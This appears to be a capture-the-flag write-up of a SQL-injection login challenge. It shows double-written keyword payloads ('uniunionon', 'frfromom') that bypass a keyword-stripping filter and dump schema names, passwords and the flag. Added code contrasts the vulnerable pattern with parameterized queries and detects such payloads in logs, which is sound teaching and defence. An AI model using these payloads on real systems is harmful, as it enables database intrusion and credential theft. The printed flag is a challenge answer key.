[TOC]

First, the familiar black login form:

Determine which quote character closes the string:

A single quote triggers an error, while a double quote behaves normally.

Determine which kind of injection it is:

First, try a universal-password payload:

No error message appears, but there is no result either, so `or` may be filtered. Verify again:

Confirmed: `or` is filtered. Try a double-write bypass:

That gets through. Next, check whether select, union and from are filtered:

select, union and from are all filtered.

Summary: the filtered keywords are or, select, union, from.
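The reason double-writing works is worth seeing in code. The following is an added example, not the challenge's check.php (whose source is not on this page): it assumes, based on the probing above, that the backend removes each blacklisted keyword once, case-insensitively, in a single pass, and then concatenates the result into SQL. Beside that vulnerable pattern it shows the fix, a parameterized query, which needs no blacklist at all. The table contents are constructed sample rows, not the challenge's data.

```python
"""Why a strip-the-keyword blacklist fails, and what replaces it.

Added example, not the challenge's own code. The filter below is an assumption
modelled on the behaviour observed in the write-up: each blacklisted keyword is
removed once, case-insensitively, in a single pass over the input.
"""
import re
import sqlite3

# Keywords the write-up observes being stripped ("or", "select", "union",
# "from") plus "where"/"and", which the later payloads also double-write.
BLACKLIST = ["union", "select", "from", "where", "and", "or"]


def naive_strip(value: str) -> str:
    """Single-pass, case-insensitive removal of each blacklisted keyword.

    Because the string is not rescanned after a removal, "uniunionon" loses
    its inner "union" and the outer letters close up to spell "union" again.
    """
    for kw in BLACKLIST:
        value = re.sub(kw, "", value, flags=re.IGNORECASE)
    return value


def build_demo_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows (not the challenge data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE b4bsql (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO b4bsql VALUES (?, ?, ?)",
        [(1, "admin", "constructed_admin_pw"), (2, "guest", "constructed_guest_pw")],
    )
    conn.commit()
    return conn


def login_blacklist(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable pattern: blacklist filter, then SQL built by string formatting."""
    username = naive_strip(username)
    password = naive_strip(password)
    sql = f"SELECT id FROM b4bsql WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened pattern: placeholders keep user input as data; no filter needed."""
    row = conn.execute(
        "SELECT id FROM b4bsql WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = build_demo_db()
    # The write-up's final payload (URL-decoded) collapses back to plain SQL keywords.
    payload = "admin1'uniunionon selselectect 1,2,group_concat(passwoorrd) frfromom b4bsql#"
    print(naive_strip(payload))
    # A double-written "or" turns the rejected tautology into an accepted one...
    print(login_blacklist(conn, "admin", "x' oorr '1'='1"))
    # ...while the same string is just a wrong password once parameterized.
    print(login_parameterized(conn, "admin", "x' oorr '1'='1"))
    print(login_parameterized(conn, "admin", "constructed_admin_pw"))
```

Note that `passwoorrd` and `infoorrmation_schema` are needed in the write-up's payloads for the same reason: the bare words contain `or`, so the filter would mangle them unless the inner `or` is there to be eaten.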

List the databases:

Result: 'information_schema,mysql,performance_schema,test,ctf,geek'

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23
// URL-decoded form:
?username=admin&password=admin1'uniunionon selselectect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata #

List the table names:

Found that the information_schema database contains two tables: 'b4bsql,geekuser'

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin
&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23
// URL-decoded form:
?username=admin
&password=admin1'uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

List the column names:

Found that table b4bsql in the information_schema database has the columns: 'id,username,password'

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin
&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23
// URL-decoded form:
?username=admin
&password=admin1'uniunionon selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#

Query the fields:

Hello 2!

Your password is 'i_want_to_play_2077,sql_injection_is_so_fun,do_you_know_pornhub,github_is_different_from_pornhub,you_found_flag_so_stop,i_told_you_to_stop,hack_by_cl4y,flag{9a1fb271-a74a-458a-b29a-e1c6432bb270}'

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23

// URL-decoded form:
?username=admin&password=admin1'uniunionon selselectect 1,2,group_concat(passwoorrd) frfromom b4bsql#

That is the direct route.

Alternatively, the database listing above showed a ctf database; list the table names in the ctf database:

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema="ctf" %23

Query the column names in Flag:

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin
&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27Flag%27%23

Query the field names in Flag:

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23

Query the flag column of table Flag in the ctf database:

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin
&password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23

Flag obtained.
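From the defender's side, every request in this write-up leaves a recognisable trace in the web server's access log: keywords nested inside themselves (`uniunionon`, `frfromom`, `oorr`), and names such as `information_schema` or `group_concat` that never belong in a login parameter. The following is an added example, not part of the original write-up: a small scanner that decodes each request's query string, flags double-written keywords by enumerating every way a keyword can be nested in itself, and re-applies the assumed single-pass strip so that the SQL the backend would actually have seen can be checked. The log lines are constructed for the example (the two payloads are the encoded ones from the write-up, the hosts and timestamps are made up), and the heuristics are deliberately simple.

```python
"""Spot double-written SQL keywords and enumeration markers in access-log lines.

Added example; the sample log below is constructed, and the single-pass strip
in collapse() is an assumption about the backend, not its real source.
"""
import re
from urllib.parse import parse_qsl, urlsplit

KEYWORDS = ["union", "select", "from", "where", "and", "or"]
# Names that have no business in a login parameter but appear in enumeration payloads.
MARKERS = ["information_schema", "group_concat", "schema_name", "table_name", "column_name"]


def doubled_forms(kw):
    """Every way to nest kw inside a copy of itself, e.g. 'uni' + 'union' + 'on'."""
    return [kw[:i] + kw + kw[i:] for i in range(1, len(kw))]


DOUBLED_RE = re.compile(
    "|".join(re.escape(f) for kw in KEYWORDS for f in doubled_forms(kw)), re.IGNORECASE
)
# After a single-pass strip the payload reads as plain SQL; look for that reassembled shape.
INJECTION_RE = re.compile(r"'\s*(?:union\b|or\b|and\b)|#\s*$", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def collapse(value):
    """Reproduce the assumed single-pass keyword strip to see what the backend would see."""
    for kw in KEYWORDS:
        value = re.sub(kw, "", value, flags=re.IGNORECASE)
    return value


def inspect_query(query):
    """Return human-readable findings for one (still URL-encoded) query string."""
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        for hit in DOUBLED_RE.findall(value):
            findings.append(f"{name}: double-written keyword {hit!r}")
        seen = collapse(value).lower()
        for marker in MARKERS:
            if marker in seen:
                findings.append(f"{name}: enumeration marker {marker!r} after collapse")
        if INJECTION_RE.search(seen):
            findings.append(f"{name}: SQL shape after collapse: {seen!r}")
    return findings


def scan_log(lines):
    """Return [(line_number, findings)] for access-log lines that look like injection."""
    results = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = inspect_query(urlsplit(m.group(1)).query)
        if findings:
            results.append((n, findings))
    return results


# Constructed access-log sample: lines 2 and 4 carry the write-up's encoded payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Aug/2021:20:25:03 +0800] "GET /check.php?username=admin&password=admin HTTP/1.1" 200 512',
    '10.0.0.5 - - [07/Aug/2021:20:48:54 +0800] "GET /check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23 HTTP/1.1" 200 640',
    '10.0.0.7 - - [07/Aug/2021:20:50:11 +0800] "GET /check.php?username=alice&password=Correct%20Horse HTTP/1.1" 200 512',
    '10.0.0.5 - - [07/Aug/2021:21:13:58 +0800] "GET /check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23 HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG):
        print(f"line {n}:")
        for f in findings:
            print("  ", f)
```

The doubled-keyword check is the most specific signal: `oorr` or `frfromom` almost never occur in genuine input, whereas a bare `or` does (it is inside "Horse" on line 3, which is why the scanner does not flag keywords on their own). Flagging is only the detection half; the fix for the application itself is the parameterized query shown earlier.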